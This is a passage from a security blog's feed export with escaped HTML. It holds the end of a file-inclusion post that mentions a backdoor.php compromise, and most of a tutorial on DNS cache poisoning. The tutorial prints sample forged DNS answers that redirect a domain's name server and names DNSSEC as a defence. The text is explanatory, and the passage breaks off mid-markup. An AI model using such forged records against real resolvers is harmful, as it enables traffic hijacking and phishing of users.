&amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;If  everything goes well then get.php will try to open backdoor.php which  will compromise the server (or something else, depends on what’s in it).  It makes RFI a deadly vulnerability.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/860177674517433288/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/file-inclusion-attack-lfirfi.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/860177674517433288'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/860177674517433288'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/file-inclusion-attack-lfirfi.html' title='File Inclusion Attack (LFI/RFI)'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-PzM5hUHQGS0/Wztu3xcI9RI/AAAAAAAAAmU/bl60VQazz4glLHTaK8zGzRF8RM11cqE4gCLcBGAs/s72-c/File%2BInclusion.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-5842959237228986519</id><published>2018-07-12T06:48:00.000-07:00</published><updated>2018-07-22T15:02:50.527-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="DNS"/><category scheme="http://www.blogger.com/atom/ns#" term="Exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Server"/><category scheme="http://www.blogger.com/atom/ns#" term="Technology"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>DNS Poisoning Attack</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://2.bp.blogspot.com/-Kll8OMs8CNA/W0IC60I7slI/AAAAAAAAADM/hznlVfBu_XUpWHB5AeOh8bd1PbWzMiXagCLcBGAs/s1600/DNS%2BPoisoning%2BAttack.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://2.bp.blogspot.com/-Kll8OMs8CNA/W0IC60I7slI/AAAAAAAAADM/hznlVfBu_XUpWHB5AeOh8bd1PbWzMiXagCLcBGAs/s640/DNS%2BPoisoning%2BAttack.jpg&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Okay a little introduction in advance, what is &lt;b&gt;DNS Poisoning&amp;nbsp;&lt;/b&gt;?&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;DNS spoofing&lt;/b&gt;, commonly referred to as &lt;b&gt;DNS Cache Poisoning&lt;/b&gt;, is a form of computer security hacking where corrupt &lt;b&gt;Domain Name System (DNS)&lt;/b&gt; data is inserted into the DNS resolver cache, causing the Name Server  to return an incorrect record of results, eg. IP address. This results  in traffic being routed to the attacker&#39;s computer (or other computer).&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: large;&quot;&gt;&lt;b&gt;Overview of the domain name system&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;A domain name Server System translates human-readable domain names (such as &lt;b&gt;suicide-db.com&lt;/b&gt;)  into numeric IP addresses used to route communication between nodes.  Usually if the server does not know the requested translation, it will  ask another server, and the process continues recursively. To improve  performance, the server typically will remember (&lt;b&gt;cache&lt;/b&gt;) this  translation for a certain period of time. This means that if it receives  another request for the same translation, it can reply without needing  to ask another server, until the cache expires.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;When  the DNS server receives a fake translation and saves it for performance  optimization, it is considered toxic, and it supplies false data to the  client. If the DNS server is poisoned, it may return an incorrect IP  address, redirecting traffic to another computer (often an attacker).&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: large;&quot;&gt;&lt;b&gt;Cache poisoning attacks&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Normally,  a networked computer uses a DNS server provided by an Internet service  provider (ISP) or the computer user&#39;s organization. DNS servers are used  in an organization&#39;s network to improve resolution response performance  by caching previously obtained query results. Poisoning attacks on a  single DNS server can affect the users serviced directly by the  compromised server or those serviced indirectly by its downstream  server(s) if applicable.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;To perform a cache poisoning attack, the attacker &lt;b&gt;exploits&lt;/b&gt; flaws in the DNS software. A server should correctly validate DNS  responses to ensure that they are from an authoritative source (for  example by using &lt;b&gt;&lt;a href=&quot;https://en.wikipedia.org/wiki/Domain_Name_System_Security_Extensions&quot;&gt;DNSSEC&lt;/a&gt;&lt;/b&gt;);  otherwise the server might end up caching the incorrect entries locally  and serve them to other users that make the same request.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;This  attack can be used to redirect users from a website to another site of  the attacker&#39;s choosing. For example, an attacker spoofs the IP address  DNS entries for a target website on a given DNS server and replaces them  with the IP address of a server under their control. The attacker then  creates files on the server under their control with names matching  those on the target server. These files usually contain &lt;b&gt;malicious&lt;/b&gt; content, such as &lt;b&gt;computer worms&lt;/b&gt; or &lt;b&gt;viruses&lt;/b&gt;.  A user whose computer has referenced the poisoned DNS server gets  tricked into accepting content coming from a non-authentic server and  unknowingly downloads the malicious content. This technique can also be  used for &lt;b&gt;phishing attacks&lt;/b&gt;, where a fake version of a genuine website is created to gather personal details such as bank and credit/debit card details.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: large;&quot;&gt;&lt;b&gt;Variants&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;In the following variants, the entries for the server &lt;b&gt;ns.suicide-db.com&amp;nbsp;&lt;/b&gt;would be poisoned and redirected to the attacker&#39;s name server at IP address &lt;b&gt;127.0.0.1&lt;/b&gt;. These attacks assume that the name server for &lt;b&gt;suicide-db.com&lt;/b&gt; is &lt;b&gt;ns.suicide-db.com&lt;/b&gt;.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;To  accomplish the attacks, the attacker must force the target DNS server  to make a request for a domain controlled by one of the attacker&#39;s  nameservers.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: large;&quot;&gt;&lt;b&gt;Redirect the target domain&#39;s name server&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;The  first variant of DNS cache poisoning involves redirecting the name  server of the attacker&#39;s domain to the name server of the target domain,  then assigning that name server an IP address specified by the  attacker.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;DNS server&#39;s request : what are the address records for subdomain.attacker.com?&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: left; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Example :&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; font-size: 14px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 5px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;subdomain.attacker.com. IN A&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: left; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Attacker&#39;s response :&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 5px; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Answer:&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;(no response)&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Authority section:&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;attacker.com. 3600 IN NS ns.suicide-db.com.&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Additional section:&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;ns.suicide-db.com. IN A 127.0.0.1&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;A  vulnerable server would cache the additional A-record (IP address) for  ns.target.example, allowing the attacker to resolve queries to the  entire &lt;b&gt;suicide-db.com&amp;nbsp;&lt;/b&gt;domain.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: large;&quot;&gt;&lt;b&gt;Redirect the NS record to another target domain&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;The  second variant of DNS cache poisoning involves redirecting the  nameserver of another domain unrelated to the original request to an IP  address specified by the attacker.[citation needed]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;DNS server&#39;s request: what are the address records for subdomain.attacker.com?&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: left; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Example :&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 